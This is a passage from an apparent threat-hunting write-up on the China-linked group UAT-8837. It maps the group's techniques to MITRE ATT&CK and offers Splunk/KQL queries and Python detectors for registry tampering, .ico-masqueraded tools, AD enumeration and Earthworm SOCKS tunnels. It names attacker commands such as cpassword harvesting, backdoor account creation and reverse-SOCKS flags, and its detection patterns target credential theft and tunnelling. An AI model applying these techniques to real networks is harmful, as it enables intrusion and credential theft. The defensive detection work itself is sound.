
UAT-8837: China-Nexus APT Targeting North American Critical Infrastructure

A China-linked threat group tracked as UAT-8837 is actively targeting critical infrastructure organizations across North America. The group focuses on telecommunications, energy, water, and transportation sectors. UAT-8837 exploits vulnerabilities in public-facing web applications to gain initial access, then conducts extensive reconnaissance of internal networks and directory environments to identify high-value targets.

Think of UAT-8837 as a locksmith who breaks into a building's lobby, then methodically copies every master key, maps every hallway, and installs hidden back doors before anyone notices the first lock was picked. The group uses stolen credentials and remote access tools to spread across networks while disguising its attack tools as harmless icon files to avoid detection.

Compromised organizations face credential theft across their entire domain, unauthorized access to sensitive systems, and the creation of hidden backdoor accounts that persist long after the initial breach is discovered. The group also steals proprietary software libraries from compromised environments, raising the risk of future supply chain attacks affecting downstream customers and partners.

Hunting Controls & Observations

Organizations can detect UAT-8837 activity through multiple telemetry sources:

  • Endpoint Controls: EDR/XDR platforms, Sysmon (Events 1, 3, 11, 12/13), PowerShell logging (Event IDs 4103, 4104), file integrity monitoring for staging directories, registry modification alerts
  • Network Controls: Firewall logs monitoring outbound SOCKS proxy connections, IDS/IPS (Snort SIDs 61883, 61884, 63727, 63728), NetFlow analysis for multi-port C2 tunneling patterns
  • Identity & Access Controls: Windows Event IDs 4624 (logon), 4720 (account creation), 4732 (group membership), Kerberos ticket request anomalies, Active Directory object access auditing
  • Application Controls: SiteCore application logs for ViewState deserialization exploitation attempts (CVE-2025-53690), WMI execution logs, Remote Desktop connection auditing

Behavioral Indicators of Attack

  • DisableRestrictedAdmin Registry Modification (Endpoint): UAT-8837 modifies the registry key HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin to enable pass-the-hash attacks over RDP. This change removes RDP restricted admin protections and enables lateral movement with stolen NTLM hashes.
  • Executable Masquerading with .ico Extensions (Endpoint): The threat actor renames attack tools (Earthworm, GoExec, Rubeus, SharpWMI) with .ico file extensions and stages them in C:\Windows\Temp\ and C:\Users\public\ directories. PE executables with icon file extensions indicate deliberate evasion of file-type-based detection.
  • Rapid Active Directory Enumeration via Native Tools (Endpoint/Identity): Sequential execution of dsquery, dsget, setspn, net group, and nltest commands within short time windows indicates systematic directory reconnaissance. UAT-8837 uses these living-off-the-land binaries to map domain structure, enumerate service accounts, and identify domain controllers.
  • Earthworm Reverse SOCKS Proxy Tunneling (Network): The threat actor deploys multiple instances of Earthworm with the -s rssocks flag across non-standard ports (443, 447, 1433, 8888, 11112). Multiple simultaneous tunnel connections to the same external IP on different ports indicate redundant C2 channel establishment.
  • GoExec WMI-Based Remote Command Execution (Endpoint/Network): UAT-8837 uses GoExec with WMI and DCOM execution methods, passing NTLM hashes directly for authentication. Command patterns include wmi proc and dcom mmc with internal IP targets and hash-based authentication.
  • Group Policy Preferences Password Harvesting (Identity): Execution of findstr /S /l cpassword targeting Group Policy XML files indicates credential harvesting from legacy Group Policy Preferences. This technique extracts stored passwords from domain-accessible policy files.
  • Iterative Tool Cycling Under Detection Pressure (Endpoint): UAT-8837 deploys multiple variants of the same tool category (Impacket, then Invoke-WMIExec, then GoExec) when security products detect earlier versions. Rapid sequential deployment of functionally similar tools from staging directories signals active evasion of endpoint detection.
  • Backdoor Domain Account Creation (Identity): The threat actor creates new domain accounts using net user /add /domain and adds them to privileged local groups. Account creation outside normal provisioning workflows, particularly during off-hours, signals unauthorized persistence establishment.

MITRE Enterprise ATT&CK Tactics and Techniques

UAT-8837's methodology aligns with MITRE ATT&CK Enterprise tactics across the kill chain:

  • Initial Access (T1190 - Exploit Public-Facing Application): UAT-8837 exploits CVE-2025-53690, a ViewState deserialization vulnerability in SiteCore, to achieve remote code execution on publicly accessible web servers. The group targets internet-facing applications as the primary entry point into critical infrastructure networks.
  • Defense Evasion (T1036 - Masquerading): The threat actor renames executable tools with .ico extensions to evade file-type-based detection. Tools like Earthworm, GoExec, and Rubeus are deployed as v.ico, goe.ico, and r.ico in staging directories.
  • Defense Evasion (T1556 - Modify Authentication Process): UAT-8837 modifies the DisableRestrictedAdmin registry value to remove RDP restricted admin protections. This enables pass-the-hash attacks over Remote Desktop Protocol without requiring plaintext credentials.
  • Discovery (T1087.002 - Account Discovery: Domain Account): The threat actor conducts extensive Active Directory reconnaissance using native Windows tools including dsquery, dsget, net group, and net user. These commands enumerate domain administrators, service accounts, and organizational unit structures.
  • Discovery (T1482 - Domain Trust Discovery): UAT-8837 uses nltest /DCLIST and nslookup to enumerate domain controllers and map trust relationships. This reconnaissance enables the group to identify additional targets across trusted domains.
  • Credential Access (T1558 - Steal or Forge Kerberos Tickets): The group deploys Rubeus for Kerberos ticket manipulation, enabling Kerberoasting and ticket forgery attacks. Combined with setspn enumeration, this technique extracts service account credentials from Active Directory.
  • Lateral Movement (T1550.002 - Use Alternate Authentication Material: Pass the Ticket): UAT-8837 leverages stolen Kerberos tickets and NTLM hashes to authenticate across the network without plaintext passwords. GoExec executes commands on remote systems using pass-the-hash authentication via WMI and DCOM.
  • Lateral Movement (T1021.001 - Remote Services: Remote Desktop Protocol): After disabling restricted admin protections, the threat actor uses RDP with stolen credentials for interactive access to compromised systems. This provides hands-on-keyboard control for deeper reconnaissance and data collection.
  • Command and Control (T1090 - Proxy): UAT-8837 establishes reverse SOCKS proxy tunnels using Earthworm to route traffic through compromised systems to attacker infrastructure. Multiple simultaneous tunnels on ports 443, 447, 1433, and 8888 provide redundant command and control channels.
  • Exfiltration (T1048 - Exfiltration Over Alternative Protocol): The threat actor exfiltrates stolen credentials, security configurations, and proprietary DLLs through Earthworm SOCKS proxy tunnels across multiple ports. Using SQL Server port 1433 and other non-standard ports for tunneling disguises exfiltration as legitimate traffic.

Controls' Observables

Endpoint Controls

Endpoint detection and response platforms can identify UAT-8837 through multiple behavioral signatures:

  • Registry Modification for RDP Bypass: Monitor for changes to HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin. Any modification to this value outside authorized hardening workflows indicates potential pass-the-hash preparation. (Related MITRE Techniques: T1556, T1021.001 | Detection Difficulty: LOW)
  • PE Executables with Non-Executable Extensions: Alert on process execution from files with .ico, .jpg, or other non-executable extensions, particularly in C:\Windows\Temp\ and C:\Users\public\ directories. (Related MITRE Techniques: T1036, T1036.004 | Detection Difficulty: LOW)
  • Rapid Native Tool Execution Sequences: Detect sequential execution of dsquery, dsget, setspn, net group, and nltest within short time windows (under 10 minutes). Legitimate administration rarely triggers this volume of AD queries in rapid succession. (Related MITRE Techniques: T1087.002, T1482 | Detection Difficulty: MEDIUM)
  • GoExec Command-Line Patterns: Monitor for process execution with command-line arguments containing wmi proc or dcom mmc combined with IP addresses and the -H flag (hash-based authentication). (Related MITRE Techniques: T1550.002, T1021.006 | Detection Difficulty: LOW)
  • Security Policy Export Activity: Alert on execution of secedit /export commands that dump Windows security policies to temporary files, indicating security configuration reconnaissance. (Related MITRE Techniques: T1201 | Detection Difficulty: LOW)

Network Controls

Network monitoring systems can detect UAT-8837's tunneling and command-and-control activities:

  • Multi-Port Outbound Connections to Single IP: Alert on connections from internal hosts to the same external IP across multiple ports (443, 447, 1433, 8888, 11112). UAT-8837 establishes redundant Earthworm tunnels for persistent C2 access. (Related MITRE Techniques: T1090, T1571 | Detection Difficulty: LOW)
  • SOCKS Proxy Traffic Patterns: Detect outbound traffic patterns consistent with SOCKS proxy handshakes, particularly on non-standard ports like 447, 1433, and 8888. (Related MITRE Techniques: T1090.001 | Detection Difficulty: MEDIUM)
  • WMI Remote Execution Network Traffic: Monitor for WMI/DCOM network traffic between internal systems that do not normally communicate, particularly when combined with NTLM authentication. (Related MITRE Techniques: T1021.006, T1550.003 | Detection Difficulty: MEDIUM)

Identity & Access Controls

Identity and authentication monitoring can detect UAT-8837's credential abuse and persistence establishment:

  • Unauthorized Domain Account Creation: Alert on net user /add /domain execution and Windows Event ID 4720 (user account creation) outside normal provisioning workflows. UAT-8837 creates backdoor accounts for persistent access. (Related MITRE Techniques: T1136.002 | Detection Difficulty: LOW)
  • Kerberos Ticket Anomalies: Monitor for unusual Kerberos ticket requests, particularly Kerberoasting patterns (TGS requests for service accounts with weak encryption) and ticket forgery indicators from Rubeus. (Related MITRE Techniques: T1558, T1558.003 | Detection Difficulty: MEDIUM)
  • Group Policy Preferences Password Access: Detect execution of findstr targeting cpassword in Group Policy XML files. This indicates harvesting of legacy stored credentials from domain-accessible policy files. (Related MITRE Techniques: T1555 | Detection Difficulty: LOW)
  • Pass-the-Hash Authentication Patterns: Alert on NTLM authentication events (Event ID 4624, Logon Type 3) from unexpected sources combined with RDP sessions (Logon Type 10) to systems where DisableRestrictedAdmin was recently modified. (Related MITRE Techniques: T1550.002, T1550.003 | Detection Difficulty: MEDIUM)

Insights and Recommendations

Organizations compromised by UAT-8837 face domain-wide credential theft, unauthorized persistent access through backdoor accounts, and complete Active Directory compromise enabling lateral movement to any connected system. The group's exfiltration of proprietary software libraries introduces supply chain risk that extends beyond the immediate victim to customers and partners who rely on those products. Recovery requires full credential rotation across the domain, forensic investigation of all systems contacted by Earthworm tunnels, and remediation of the initial web application vulnerability.

Security teams should prioritize monitoring for DisableRestrictedAdmin registry modifications (T1556) and executable files with .ico extensions in staging directories (T1036), as these represent early-stage indicators before lateral movement begins. Detection engineering efforts should focus on behavioral patterns: rapid Active Directory enumeration sequences using native tools (T1087.002), multi-port outbound connections to single external IPs (T1090), and WMI-based remote execution with hash-based authentication (T1550.002). Organizations running SiteCore should prioritize patching CVE-2025-53690, restrict outbound connectivity from web servers, and implement network segmentation to limit lateral movement from DMZ systems into internal Active Directory environments.

Source and Credits

This summary is based on Cisco Talos Intelligence's research article "UAT-8837 targets critical infrastructure sectors in North America" published on January 15, 2026. Additional IOCs are available at the Cisco Talos IOC repository.

Threat Hunting IOCs & Queries

Known Indicators of Compromise

  • File Hashes (SHA-256):
  • C2 IP Addresses:
  • File Paths:
    • C:\Windows\Temp\v.ico, eir.ico, cisos.ico, vgent.ico (Earthworm variants)
    • C:\Windows\Temp\goe.exe, goe.ico (GoExec)
    • C:\Windows\Temp\r.ico (Rubeus)
    • C:\Windows\Temp\s.ico (SharpWMI)
    • C:\Windows\Temp\wec.ico (Impacket)
    • C:\Windows\Temp\SharpHound.exe, Certipy.exe
    • C:\Users\public\music\aa.exe, twd.exe (Earthworm)
  • Registry Keys:
    • HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin (set to 0x00000000)

Query 1: DisableRestrictedAdmin Registry Modification

Behavior Targeted: Detects modification of the DisableRestrictedAdmin registry value, a technique UAT-8837 uses to enable pass-the-hash attacks over RDP. This registry change removes restricted admin protections, allowing lateral movement with stolen NTLM hashes without plaintext credentials.
MITRE ATT&CK: T1556, T1021.001
Expected Results: Events showing registry modifications to the DisableRestrictedAdmin value, particularly from command-line REG ADD operations or non-standard processes. True positives show this modification followed by RDP connections from unexpected sources.
False Positive Likelihood: LOW - This registry modification is uncommon in most environments. Legitimate changes occur only during specific RDP hardening configurations and are typically managed through Group Policy.
Tuning Guidance: Investigate any modification to this registry value outside of authorized change windows. Correlate with subsequent RDP logon events (Event ID 4624, Logon Type 10) to identify lateral movement following the registry change.

Splunk SPL Query

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=13
    earliest=-7d
    TargetObject="HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin"
| eval Details=coalesce(Details, "unknown")
| stats count, values(Details) as RegistryValues,
        earliest(_time) as FirstSeen, latest(_time) as LastSeen
    by ComputerName, User, Image, TargetObject
| eval FirstSeen=strftime(FirstSeen, "%Y-%m-%d %H:%M:%S"),
       LastSeen=strftime(LastSeen, "%Y-%m-%d %H:%M:%S")
| table FirstSeen, LastSeen, ComputerName, User, Image, TargetObject, RegistryValues, count
| sort - FirstSeen

// TUNING: This registry modification is rarely legitimate - investigate all results
// TUNING: Correlate with Event ID 4624 Logon Type 10 (RDP) within 1 hour of modification
// FALSE POSITIVES: GPO-managed RDP hardening, authorized IT admin configuration changes

Microsoft KQL Query (Defender/Sentinel)

DeviceRegistryEvents
| where Timestamp > ago(7d)
| where RegistryKey has "CurrentControlSet\\Control\\Lsa"
| where RegistryValueName =~ "DisableRestrictedAdmin"
| extend ModifiedBy = InitiatingProcessFileName
| extend ModifiedByPath = InitiatingProcessFolderPath
| extend CommandUsed = InitiatingProcessCommandLine
| project Timestamp, DeviceName, ModifiedBy, ModifiedByPath, CommandUsed,
          RegistryKey, RegistryValueName, RegistryValueData, ActionType
| order by Timestamp desc

// TUNING: Investigate all results - this modification is rarely legitimate
// TUNING: Join with DeviceLogonEvents (LogonType == "RemoteInteractive") within 1 hour
// FALSE POSITIVES: Group Policy-managed RDP configuration, authorized hardening scripts

Note: These queries were generated with AI assistance. Test thoroughly in your environment before production use.

Query 2: Executable Files Masquerading with .ico Extensions

Behavior Targeted: Detects execution of PE executable files renamed with .ico extensions, a masquerading technique UAT-8837 uses to evade file-type-based security controls. The threat actor stages tools like Earthworm, GoExec, and Rubeus as .ico files in Windows Temp and Public directories.
MITRE ATT&CK: T1036, T1036.004
Expected Results: Process creation events where the executable file has an .ico extension but exhibits PE executable behavior. True positives show .ico files executing with command-line arguments consistent with attack tooling (e.g., -s rssocks, wmi proc).
False Positive Likelihood: LOW - Legitimate .ico files are image resources and do not execute as processes. Any process creation from a .ico file is suspicious.
Tuning Guidance: Expand detection to include other non-executable extensions (.jpg, .png, .bmp, .gif) used for masquerading. Focus on staging directories: C:\Windows\Temp\, C:\Users\public\, and user Desktop folders.

Splunk SPL Query

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
    earliest=-7d
    Image="*.ico"
| rex field=Image "(?<file_ext>\.\w+)$"
| where lower(file_ext)=".ico"
| stats count, values(CommandLine) as Commands,
        earliest(_time) as FirstSeen, latest(_time) as LastSeen
    by ComputerName, User, Image, ParentImage
| eval FirstSeen=strftime(FirstSeen, "%Y-%m-%d %H:%M:%S"),
       LastSeen=strftime(LastSeen, "%Y-%m-%d %H:%M:%S")
| table FirstSeen, LastSeen, ComputerName, User, Image, ParentImage, Commands, count
| sort - FirstSeen

// TUNING: Expand to other non-executable extensions: .jpg, .png, .bmp, .gif, .txt
// TUNING: Prioritize results from staging directories (C:\Windows\Temp\, C:\Users\public\)
// FALSE POSITIVES: Extremely rare - legitimate .ico files do not execute as processes

Microsoft KQL Query (Defender/Sentinel)

DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName endswith ".ico"
| extend ParentProcess = InitiatingProcessFileName
| extend FullPath = FolderPath
| extend CmdLine = ProcessCommandLine
| project Timestamp, DeviceName, AccountName, FileName, FullPath,
          ParentProcess, CmdLine, ProcessId
| order by Timestamp desc

// TUNING: Expand detection to other non-executable extensions (.jpg, .png, .bmp)
// TUNING: Correlate with DeviceFileEvents to identify when .ico files were created/dropped
// FALSE POSITIVES: Extremely rare - .ico files should not spawn processes

Note: These queries were generated with AI assistance. Test thoroughly in your environment before production use.
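The queries above catch .ico files at execution time; a file integrity sweep of the staging directories can catch them earlier, because a genuine icon begins with the ICONDIR header bytes 00 00 01 00 while a Windows executable begins with "MZ" and carries a "PE\0\0" signature at the offset stored at 0x3C. The following is an added example (not code from the Talos research or the queries above) that scans a directory for image-extension files carrying a PE header; the sample files it writes are constructed.

```python
"""Find PE executables masquerading behind image extensions in a staging directory.

Added example, not from the Talos write-up. Real .ico files start with the
ICONDIR header 00 00 01 00; a PE file starts with 'MZ' and has 'PE\\0\\0' at the
offset stored in the e_lfanew field (0x3C).
"""
import os
import struct
import tempfile

# Extensions seen in the UAT-8837 staging directories plus those the tuning guidance names
IMAGE_EXTENSIONS = {".ico", ".jpg", ".png", ".bmp", ".gif"}
ICONDIR_HEADER = b"\x00\x00\x01\x00"


def classify_header(data: bytes) -> str:
    """Return 'pe', 'mz-only', 'ico', or 'other' from the leading bytes alone."""
    if data[:2] == b"MZ" and len(data) >= 0x40:
        pe_offset = struct.unpack_from("<I", data, 0x3C)[0]
        if data[pe_offset:pe_offset + 4] == b"PE\x00\x00":
            return "pe"
        return "mz-only"   # DOS stub without a PE header: still not an icon
    if data[:4] == ICONDIR_HEADER:
        return "ico"
    return "other"


def is_masquerading_pe(path: str) -> bool:
    """True when a file with an image extension carries an MZ/PE header."""
    ext = os.path.splitext(path)[1].lower()
    if ext not in IMAGE_EXTENSIONS:
        return False
    with open(path, "rb") as fh:
        head = fh.read(4096)
    return classify_header(head) in ("pe", "mz-only")


def scan_staging_dir(directory: str) -> list:
    """Walk a staging directory (e.g. C:\\Windows\\Temp) and list suspect files."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            full = os.path.join(root, name)
            try:
                if is_masquerading_pe(full):
                    hits.append(full)
            except OSError:
                continue   # locked or unreadable file: skip it, do not abort the sweep
    return sorted(hits)


def build_fake_pe(size: int = 0x100) -> bytes:
    """Constructed minimal MZ/PE header for testing; not a runnable executable."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)   # e_lfanew -> PE signature at 0x80
    buf[0x80:0x84] = b"PE\x00\x00"
    return bytes(buf)


def demo() -> list:
    """Write constructed samples to a temp dir and return the flagged basenames."""
    with tempfile.TemporaryDirectory() as tmp:
        samples = {
            "v.ico": build_fake_pe(),                                  # PE renamed to .ico
            "real.ico": ICONDIR_HEADER + b"\x01\x00" + b"\x00" * 64,   # genuine icon header
            "goe.exe": build_fake_pe(),                                # PE with honest extension
            "notes.txt": b"plain text",
        }
        for name, data in samples.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(data)
        return [os.path.basename(p) for p in scan_staging_dir(tmp)]


if __name__ == "__main__":
    print(demo())
```

Point scan_staging_dir at C:\Windows\Temp and C:\Users\Public to sweep the directories named in the report; the check reads only the first 4 KiB of each file.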

Query 3: Rapid Active Directory Enumeration via Native Tools

Behavior Targeted: Detects rapid sequential execution of native Active Directory enumeration commands (dsquery, dsget, setspn, net group, nltest, net user) within short time windows. UAT-8837 conducts extensive AD reconnaissance using these living-off-the-land binaries to map domain structure, enumerate privileged accounts, and discover service principals for Kerberoasting.
MITRE ATT&CK: T1087.002, T1482, T1201
Expected Results: Events showing a single user or system executing 5 or more distinct AD enumeration commands within 10 minutes. True positives show commands targeting domain admin groups, service accounts, domain controllers, and security policies in rapid succession.
False Positive Likelihood: MEDIUM - System administrators and identity management tools occasionally execute AD queries. Scheduled scripts for AD health monitoring can trigger this detection. The combination of multiple query types within a short window distinguishes malicious reconnaissance from routine administration.
Tuning Guidance: Adjust the unique command threshold (currently 5) and time window based on administrative patterns in your environment. Allowlist known AD management tools and service accounts. Prioritize results from non-admin users or interactive sessions on servers.

Splunk SPL Query

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
    earliest=-24h
    (Image="*\\dsquery.exe" OR Image="*\\dsget.exe" OR Image="*\\setspn.exe"
     OR Image="*\\nltest.exe" OR Image="*\\net.exe" OR Image="*\\net1.exe")
| eval ad_command=case(
    match(Image, "dsquery"), "dsquery",
    match(Image, "dsget"), "dsget",
    match(Image, "setspn"), "setspn",
    match(Image, "nltest"), "nltest",
    match(CommandLine, "(?i)net1?(\.exe)?\s+(group|user|localgroup|accounts)"), "net_ad",
    1=1, "other")
| where ad_command!="other"
| bin span=10m _time AS time_bucket
| stats dc(ad_command) as UniqueCommands,
        values(ad_command) as CommandTypes,
        values(CommandLine) as FullCommands,
        count,
        earliest(_time) as FirstSeen, latest(_time) as LastSeen
    by ComputerName, User, time_bucket
| where UniqueCommands >= 4
| eval FirstSeen=strftime(FirstSeen, "%Y-%m-%d %H:%M:%S"),
       LastSeen=strftime(LastSeen, "%Y-%m-%d %H:%M:%S")
| table FirstSeen, LastSeen, ComputerName, User, UniqueCommands, CommandTypes, count, FullCommands
| sort - UniqueCommands

// TUNING: Adjust UniqueCommands threshold (currently >=4) based on admin behavior baseline
// TUNING: Reduce bin span (currently 10m) for stricter detection of rapid enumeration bursts
// FALSE POSITIVES: AD health monitoring scripts, identity management tools, IT admin troubleshooting

Microsoft KQL Query (Defender/Sentinel)

DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName in~ ("dsquery.exe", "dsget.exe", "setspn.exe", "nltest.exe", "net.exe", "net1.exe")
| where ProcessCommandLine has_any ("group", "user", "localgroup", "accounts",
                                     "DCLIST", "domain", "-L", "-Q", "dsquery", "dsget")
| extend ADCommand = case(
    FileName =~ "dsquery.exe", "dsquery",
    FileName =~ "dsget.exe", "dsget",
    FileName =~ "setspn.exe", "setspn",
    FileName =~ "nltest.exe", "nltest",
    FileName in~ ("net.exe", "net1.exe"), "net_ad",
    "other")
| summarize UniqueCommands = dcount(ADCommand),
            CommandTypes = make_set(ADCommand),
            FullCommands = make_set(ProcessCommandLine, 20),
            Count = count(),
            FirstSeen = min(Timestamp),
            LastSeen = max(Timestamp)
    by DeviceName, AccountName, bin(Timestamp, 10m)
| where UniqueCommands >= 4
| extend TimeSpanSeconds = datetime_diff('second', LastSeen, FirstSeen)
| project FirstSeen, LastSeen, DeviceName, AccountName, UniqueCommands,
          CommandTypes, Count, TimeSpanSeconds, FullCommands
| order by UniqueCommands desc

// TUNING: Adjust UniqueCommands (>=4) and bin window (10m) based on admin patterns
// TUNING: Allowlist known AD management service accounts and monitoring tools
// FALSE POSITIVES: Identity management platforms, scheduled AD health checks, admin troubleshooting

Note: These queries were generated with AI assistance. Test thoroughly in your environment before production use.
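The same burst logic, as an added example that is not part of the Talos research or the queries above. It goes one step beyond the SPL/KQL by using a sliding window rather than fixed 10-minute bins, so a burst that straddles a bin boundary is still reported; the Sysmon Event ID 1 records it runs over are constructed.

```python
"""Flag bursts of native AD enumeration commands (the logic behind Query 3).

Added example, not part of the Talos research or the queries above. It uses a
sliding window instead of the fixed 10-minute bins the SPL/KQL use. Input
records are constructed Sysmon Event ID 1 fields: ts, host, user, image, cmdline.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Image name -> command family; net.exe / net1.exe are classified by command line
IMAGE_FAMILIES = {"dsquery.exe": "dsquery", "dsget.exe": "dsget",
                  "setspn.exe": "setspn", "nltest.exe": "nltest"}
# net.exe hands off to net1.exe, so the regex accepts both spellings
NET_AD_RE = re.compile(r"\bnet1?(?:\.exe)?\s+(group|user|localgroup|accounts)\b", re.I)


def classify(image: str, cmdline: str):
    """Return the AD command family for one process event, or None if unrelated."""
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if name in IMAGE_FAMILIES:
        return IMAGE_FAMILIES[name]
    if name in ("net.exe", "net1.exe") and NET_AD_RE.search(cmdline):
        return "net_ad"
    return None


def find_enum_bursts(events, window=timedelta(minutes=10), threshold=4):
    """Return (host, user, first_ts, last_ts, families) for each burst found.

    A burst is >= threshold distinct families run by one (host, user) pair
    within `window`. Defaults mirror the query (4 families, 10 minutes).
    """
    per_actor = defaultdict(list)
    for ev in events:
        fam = classify(ev["image"], ev["cmdline"])
        if fam:
            per_actor[(ev["host"], ev["user"])].append((ev["ts"], fam))

    bursts = []
    for (host, user), items in per_actor.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            # advance the window start until the span fits inside `window`
            while items[end][0] - items[start][0] > window:
                start += 1
            families = {fam for _, fam in items[start:end + 1]}
            if len(families) >= threshold:
                bursts.append((host, user, items[start][0], items[end][0],
                               sorted(families)))
                start = end + 1   # do not report the same events twice
    return bursts


def sample_events():
    """Constructed Sysmon Event 1 records: one recon burst plus routine admin noise."""
    t0 = datetime(2026, 1, 10, 2, 14, 0)   # off-hours, on a web server
    sys32 = "C:\\Windows\\System32\\"
    recon = [
        ("dsquery.exe", 'dsquery group -name "Domain Admins"'),
        ("dsget.exe", 'dsget group "CN=Domain Admins,CN=Users,DC=corp,DC=local" -members'),
        ("net1.exe", 'net1 group "Domain Admins" /domain'),
        ("setspn.exe", "setspn -T corp -Q */*"),
        ("nltest.exe", "nltest /DCLIST:corp"),
    ]
    events = [{"ts": t0 + timedelta(minutes=i), "host": "SRV-APP01",
               "user": "CORP\\svc_web", "image": sys32 + img, "cmdline": cmd}
              for i, (img, cmd) in enumerate(recon)]
    # Two admin commands an hour apart: must not trigger
    events.append({"ts": t0 + timedelta(hours=3), "host": "WS-ADMIN", "user": "CORP\\jdoe",
                   "image": sys32 + "net1.exe", "cmdline": "net1 user jdoe /domain"})
    events.append({"ts": t0 + timedelta(hours=4), "host": "WS-ADMIN", "user": "CORP\\jdoe",
                   "image": sys32 + "nltest.exe", "cmdline": "nltest /dsgetdc:corp"})
    return events


if __name__ == "__main__":
    for burst in find_enum_bursts(sample_events()):
        print(burst)
```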

Query 4: Earthworm Reverse SOCKS Proxy Tunneling

Behavior Targeted: Detects command-line patterns consistent with Earthworm reverse SOCKS proxy deployment, UAT-8837's primary tunneling tool. The threat actor deploys Earthworm with the -s rssocks flag to establish reverse SOCKS tunnels to attacker-controlled infrastructure across multiple ports (443, 447, 1433, 8888, 11112) for persistent command and control.
MITRE ATT&CK: T1090, T1090.001, T1048
Expected Results: Process execution events with command-line arguments containing Earthworm signatures (-s rssocks, -s ssocksd, -s lcx_tran) combined with external IP addresses and port specifications. True positives show .ico or .exe files from staging directories executing with these arguments.
False Positive Likelihood: LOW - The rssocks command-line pattern is specific to Earthworm and similar tunneling tools. Legitimate network utilities do not use this syntax.
Tuning Guidance: Expand detection to include Earthworm port forwarding patterns (-p and -f flags) used for internal tunnel chaining. Monitor for multiple processes on the same host connecting to the same external IP on different ports, indicating redundant tunnel establishment.

Splunk SPL Query

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
    earliest=-7d
    (CommandLine="*rssocks*" OR CommandLine="*ssocksd*" OR CommandLine="*lcx_tran*"
     OR CommandLine="*lcx_slave*" OR CommandLine="*lcx_listen*")
| eval tunnel_type=case(
    match(CommandLine, "rssocks"), "Reverse SOCKS Proxy",
    match(CommandLine, "ssocksd"), "SOCKS Server",
    match(CommandLine, "lcx_tran"), "Port Forward",
    match(CommandLine, "lcx_slave"), "Slave Tunnel",
    match(CommandLine, "lcx_listen"), "Listen Tunnel",
    1=1, "Unknown")
| rex field=CommandLine "-d\s+(?<c2_ip>[\d\.]+)"
| rex field=CommandLine "-e\s+(?<c2_port>\d+)"
| stats count, values(tunnel_type) as TunnelTypes,
        values(c2_ip) as C2IPs, values(c2_port) as C2Ports,
        earliest(_time) as FirstSeen, latest(_time) as LastSeen
    by ComputerName, User, Image
| eval FirstSeen=strftime(FirstSeen, "%Y-%m-%d %H:%M:%S"),
       LastSeen=strftime(LastSeen, "%Y-%m-%d %H:%M:%S")
| table FirstSeen, LastSeen, ComputerName, User, Image, TunnelTypes, C2IPs, C2Ports, count
| sort - FirstSeen

// TUNING: Any match is high-confidence - rssocks syntax is specific to Earthworm tunneling
// TUNING: Cross-reference C2 IPs with known UAT-8837 infrastructure
// FALSE POSITIVES: Extremely rare - this command syntax is unique to Earthworm and similar tools

Microsoft KQL Query (Defender/Sentinel)

DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any ("rssocks", "ssocksd", "lcx_tran", "lcx_slave", "lcx_listen")
| extend TunnelType = case(
    ProcessCommandLine has "rssocks", "Reverse SOCKS Proxy",
    ProcessCommandLine has "ssocksd", "SOCKS Server",
    ProcessCommandLine has "lcx_tran", "Port Forward",
    ProcessCommandLine has "lcx_slave", "Slave Tunnel",
    ProcessCommandLine has "lcx_listen", "Listen Tunnel",
    "Unknown")
| extend C2IP = extract(@"-d\s+([\d\.]+)", 1, ProcessCommandLine)
| extend C2Port = extract(@"-e\s+(\d+)", 1, ProcessCommandLine)
| project Timestamp, DeviceName, AccountName, FileName, FolderPath,
          ProcessCommandLine, TunnelType, C2IP, C2Port
| order by Timestamp desc

// TUNING: Any match is high-confidence - this syntax is specific to Earthworm
// TUNING: Cross-reference C2IP values with known threat actor infrastructure
// FALSE POSITIVES: Extremely rare - legitimate tools do not use rssocks/lcx syntax

Note: These queries were generated with AI assistance. Test thoroughly in your environment before production use.
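Pulling the two detections together, the following is an added example (not code from the Talos research or the queries above) that parses Earthworm-style command lines the way the -d/-e extraction above does and then applies the Network Controls observable, flagging a host that opens tunnels to one external IP on several ports. The command lines are constructed and the address is an RFC 5737 documentation IP, not actor infrastructure.

```python
"""Parse Earthworm-style tunnel command lines and spot redundant multi-port C2.

Added example, not from the Talos write-up or the queries above. Command lines
and hosts are constructed; 203.0.113.10 is a documentation address (RFC 5737).
"""
import re
from collections import defaultdict

TUNNEL_TYPES = {"rssocks": "Reverse SOCKS Proxy", "ssocksd": "SOCKS Server",
                "lcx_tran": "Port Forward", "lcx_slave": "Slave Tunnel",
                "lcx_listen": "Listen Tunnel"}
MODE_RE = re.compile(r"-s\s+(rssocks|ssocksd|lcx_tran|lcx_slave|lcx_listen)\b")
DEST_RE = re.compile(r"-d\s+(\d{1,3}(?:\.\d{1,3}){3})")
PORT_RE = re.compile(r"-e\s+(\d{1,5})\b")
LISTEN_RE = re.compile(r"-l\s+(\d{1,5})\b")


def parse_tunnel_cmdline(cmdline: str):
    """Return a dict describing the tunnel, or None if it is not Earthworm syntax."""
    mode = MODE_RE.search(cmdline)
    if not mode:
        return None   # a stray -d or -e on an unrelated tool does not count
    dest = DEST_RE.search(cmdline)
    port = PORT_RE.search(cmdline)
    listen = LISTEN_RE.search(cmdline)
    return {
        "mode": mode.group(1),
        "type": TUNNEL_TYPES[mode.group(1)],
        "c2_ip": dest.group(1) if dest else None,
        "c2_port": int(port.group(1)) if port else None,
        "listen_port": int(listen.group(1)) if listen else None,
    }


def redundant_tunnels(events, min_ports=2):
    """Group parsed tunnels by (host, c2_ip); return those using >= min_ports ports."""
    ports = defaultdict(set)
    images = defaultdict(set)
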